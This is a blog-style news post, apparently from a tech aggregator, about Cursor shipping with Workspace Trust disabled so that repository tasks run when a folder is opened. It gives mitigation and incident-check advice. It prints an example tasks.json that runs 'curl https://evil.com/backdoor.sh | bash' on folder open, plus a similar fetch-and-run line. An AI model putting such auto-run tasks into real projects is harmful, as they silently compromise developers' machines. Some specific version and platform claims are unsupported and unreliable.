Cursor Shipped With Security Feature Disabled - Now Attackers Can Pwn You

Oasis Security found a massive security hole in Cursor AI that's been sitting there since launch. The AI code editor (basically a VS Code fork with ChatGPT bolted on) ships with Workspace Trust disabled by default. That's like shipping a car without brakes.

How Bad Is It? Clone → Open → Pwned

Here's the stupid simple attack: someone creates a repo with this malicious .vscode/tasks.json:

{
  "tasks": [
    {
      "label": "auto-pwn",
      "type": "shell", 
      "command": "curl https://evil.com/backdoor.sh | bash",
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

You clone the repo, open it in Cursor, and boom - malicious code runs with your full privileges. No popups, no warnings, no "are you sure?" dialog. Just silent execution while you're sitting there thinking "why the fuck is Cursor taking forever to load this simple React 18.3.0 project?" (Spoiler: it's because malicious code is running in the background, not because React 18.3.0 has slow startup times.)

Why This Is Worse Than It Sounds

Look, developers clone repos from GitHub constantly. Tutorial repos, code samples, open source projects, that React component you found on Stack Overflow. We're basically trained to git clone first, ask questions later.

This exploit requires zero social engineering. The attack flow is painfully simple:

  1. Attacker creates innocent-looking repo ("awesome-react-components" or whatever)
  2. Hides malicious .vscode/tasks.json in the repo
  3. You clone it, open in Cursor
  4. Game over - your machine is compromised

VS Code Extension Attack Flow

The worst part? VS Code users are fine because they shipped with security on. Only Cursor decided to disable it for "user experience".

The Fix (And Why You Should Do It Now)

VS Code Workspace Trust Dialog

First, check if you're vulnerable. In Cursor, navigate to:
Settings → Security → Workspace Trust

If it shows "Disabled" or you see tasks running automatically when opening folders, you're fucked. Enable it immediately - like, drop what you're doing and fix this right now.

Windows users: the PATH limit will fuck you if malicious code tries to download tools to long folder paths. Cursor inherits Windows' 260 character PATH limit, so attacks using super long paths might fail anyway. Small consolation when your system is compromised, but hey, take what you can get.

But here's the real kick in the teeth - even with Workspace Trust enabled, Cursor's UI is confusing. The trust dialog doesn't clearly explain what "trust" means, and developers often click "yes" out of habit because they just want to code.

The broader issue is that AI coding tools prioritize convenience over security. Cursor's explosive growth in 2025 means potentially hundreds of thousands of developers are running vulnerable installations right now.

For more context on this vulnerability, check the original Oasis Security disclosure, Cursor's security documentation, and discussions on Hacker News about the implications for AI development tools.

What This Says About AI Developer Tools

This isn't just about one bad default setting. It reveals how the AI coding tools race has companies shipping fast and fixing security later. Cursor wanted frictionless onboarding, so they said "fuck security" and disabled the one feature that would've prevented this entire class of attacks.

VS Code spent years getting security right. Cursor took VS Code, bolted on AI features, and somehow made it less secure than the original. That should worry anyone using AI-enhanced development tools.

Other AI coding tools have faced similar scrutiny - GitHub Copilot has its own security considerations, CodeWhisperer from Amazon emphasizes their security approach, and researchers have documented security risks in AI-generated code. The broader ecosystem needs better secure coding practices for AI tools, especially as these tools become more integrated into development workflows.

Frequently Asked Questions About the Cursor AI Security Vulnerability

Q

How do I protect myself from this vulnerability?

A

Open Cursor, hit Cmd/Ctrl + , for settings, then navigate to Security → Workspace Trust.

Make sure it's enabled. The setting is buried because of course it is. You'll now get prompted before opening untrusted repos, which is annoying but not as annoying as getting pwned.Note: This affects all Cursor versions from 0.1.0 through 0.39.4. If you're still running 0.35.x or earlier, just fucking update already

  • you're missing security patches too. And if you're on 0.39.3 specifically, that version has a memory leak that'll eat your RAM when opening large repos.
Q

Am I affected if I only use Cursor AI with my own code?

A

If you've literally never opened any external code

  • no Git

Hub clones, no tutorial repos, no Stack Overflow samples, no nothing

  • you're probably fine. But let's be honest, you've definitely opened external repos. We all have. So yes, you're affected.
Q

How can I tell if my system has been compromised?

A

Check your bash/zsh history for commands you didn't run.

On Mac, look at Console.app for suspicious process launches around the time you opened repos. On Linux, check ~/.bash_history and /var/log/auth.log. On Windows, good fucking luck

  • check Event Viewer if you're feeling masochistic.Look for shit like curl http://malicious.site/payload | bash or python -c "import urllib..." that you definitely didn't run. If you see network connections to random IPs right after opening a repo, that's a red flag.
Q

Does this affect VS Code users too?

A

Nope, VS Code users are fine because they're not idiots who disable security by default. This is purely a Cursor problem

  • they took a secure editor and made it less secure.
Q

What should I do if I think I've opened a malicious repository?

A

First, don't panic

  • disconnect your machine from the internet, then check what actually ran.

Look for new processes, network connections, or file changes. Change your GitHub tokens and any credentials stored on that machine.Quick commands to check:

  • ps aux | grep -v grep to see running processes
  • netstat -tuln to check network connections
  • lsof -i to see what's using network ports
  • history | tail -50 to check recent terminal commands

If you're really paranoid, nuke the machine and restore from backup.

Q

Is Cursor AI working on a fix?

A

Cursor hasn't said a damn word publicly about this. The fix is brain-dead simple

  • just enable Workspace Trust by default in new installs and force existing users through a one-time security setup. But fixing it means admitting they shipped insecurely, which companies hate doing.
Q

Are there other AI code editors with similar vulnerabilities?

A

Probably. Any VS Code fork could have this problem if they're stupid enough to disable security features. GitHub Copilot in VS Code is fine because it doesn't mess with VS Code's security. But new AI editors popping up every week? Assume they're vulnerable until proven otherwise.

Q

Why didn't anyone catch this earlier?

A

Because Cursor's user base exploded so fast in 2025 that security researchers didn't have time to audit it properly. Plus, most security folks still use terminal vim like cavemen, so they missed this entirely.

Related Tools & Recommendations

news
Similar content

Docker Desktop CVE-2025-9074: Critical Container Escape Vulnerability

A critical vulnerability (CVE-2025-9074) in Docker Desktop versions before 4.44.3 allows container escapes via an exposed Docker Engine API. Learn how to protec

Technology News Aggregation
/news/2025-08-26/docker-cve-security
100%
news
Similar content

Docker Desktop CVE-2025-9074: Critical Host Compromise

CVE-2025-9074 allows full host compromise via exposed API endpoint

Technology News Aggregation
/news/2025-08-25/docker-desktop-cve-2025-9074
100%
news
Similar content

Apple ImageIO Zero-Day CVE-2025-43300: Patch Your iPhone Now

Another zero-day in image parsing that someone's already using to pwn iPhones - patch your shit now

GitHub Copilot
/news/2025-08-22/apple-zero-day-cve-2025-43300
100%
news
Similar content

vtenext CRM Allows Unauthenticated Remote Code Execution

Three critical vulnerabilities enable complete system compromise in enterprise CRM platform

Technology News Aggregation
/news/2025-08-25/vtenext-crm-triple-rce
92%
news
Similar content

eSIM Flaw Exposes 2 Billion Devices to SIM Hijacking

NITDA warns Nigerian users as Kigen vulnerability allows remote device takeover through embedded SIM cards

Technology News Aggregation
/news/2025-08-25/esim-vulnerability-kigen
92%
news
Similar content

JetBrains AI Pricing Overhaul: Simple 1:1 Credit System Explained

Developer Tool Giant Abandons Opaque Quotas for Transparent "$1 = 1 Credit" Model

Microsoft Copilot
/news/2025-09-07/jetbrains-ai-pricing-transparency-overhaul
84%
news
Similar content

FreePBX Zero-Day Exploit Patched: Critical CVSS 10.0 Vulnerability

Emergency patches released for CVE-2025-57819 after attackers gained root access to VoIP servers since August 21st

/news/2025-09-02/freepbx-zero-day-exploit
84%
news
Similar content

Docker Desktop Hit by Critical Container Escape Vulnerability

CVE-2025-9074 exposes host systems to complete compromise through API misconfiguration

Technology News Aggregation
/news/2025-08-25/docker-cve-2025-9074
84%
news
Similar content

vtenext CRM Zero-Day: Triple Vulnerabilities Expose SMBs

Three unpatched flaws allow remote code execution on popular business CRM used by thousands of companies

Technology News Aggregation
/news/2025-08-25/apple-zero-day-rce-vulnerability
84%
news
Similar content

Plex Security Breach: Millions of Users Must Change Passwords

Popular media streaming platform discovers unauthorized access to encrypted passwords and account data in second major breach since 2022

OpenAI GPT
/news/2025-09-09/plex-security-breach
79%
news
Similar content

Urgent: Citrix NetScaler CVE-2025-7775 Zero-Day Vulnerability

CVE-2025-7775 lets attackers walk right into your network - patch or prepare for pain

Technology News Aggregation
/news/2025-08-26/citrix-netscaler-zero-day-attack
79%
news
Similar content

Git RCE Vulnerability Exploited: CVE-2025-48384 Under Attack

CVE-2025-48384 lets attackers execute code just by cloning malicious repos - CISA added it to the actively exploited list today

Technology News Aggregation
/news/2025-08-26/git-cve-rce-exploit
76%
news
Similar content

JetBrains AI Assistant: New Credit Pricing & Developer Impact

Developer favorite JetBrains just fucked over millions of coders with new AI pricing that'll drain your wallet faster than npm install

Technology News Aggregation
/news/2025-08-26/jetbrains-ai-credit-pricing-disaster
71%
news
Similar content

Gmail AI Hacked: New Phishing Attacks Exploit Google Security

New prompt injection attacks target AI email scanners, turning Google's security systems into accomplices

Technology News Aggregation
/news/2025-08-24/gmail-ai-prompt-injection
71%
news
Similar content

Anthropic's Claude AI Used in Cybercrime: Vibe Hacking & Ransomware

"Vibe Hacking" and AI-Generated Ransomware Are Actually Happening Now

Samsung Galaxy Devices
/news/2025-08-31/ai-weaponization-security-alert
71%
news
Similar content

AI Industry's $100M Lobbying Push Against Regulation

OpenAI, Meta, and Andreessen Horowitz launch coordinated Super PAC network as lobbying spending explodes 500% from previous year

/news/2025-09-02/ai-political-lobbying
54%
news
Similar content

Tech CEOs Praise Trump at White House Dinner: AI Investments & More

Zuckerberg, Cook, and others took turns kissing the ring on live TV

OpenAI/ChatGPT
/news/2025-09-05/trump-tech-ceos-ai-dinner
54%
news
Similar content

Salesforce AI: Benioff on 4,000 Job Cuts & Workforce Transformation

"I need less heads" - 4,000 customer service jobs gone, replaced by AI agents

Microsoft Copilot
/news/2025-09-08/salesforce-ai-workforce-transformation
54%
news
Similar content

Microsoft & Nebius Ink $17.4B AI Deal: GPU Cloud Partnership

Massive GPU Cloud Partnership Signals Escalating AI Arms Race as Demand Skyrockets

Redis
/news/2025-09-09/microsoft-nebius-17b-ai-deal
54%
compare
Popular choice

Deno 2 vs Node.js vs Bun: Which Runtime Won't Fuck Up Your Deploy?

The Reality: Speed vs. Stability in 2024-2025

Deno
/compare/deno/node-js/bun/performance-benchmarks-2025
54%

Recommendations combine user behavior, content similarity, research intelligence, and SEO optimization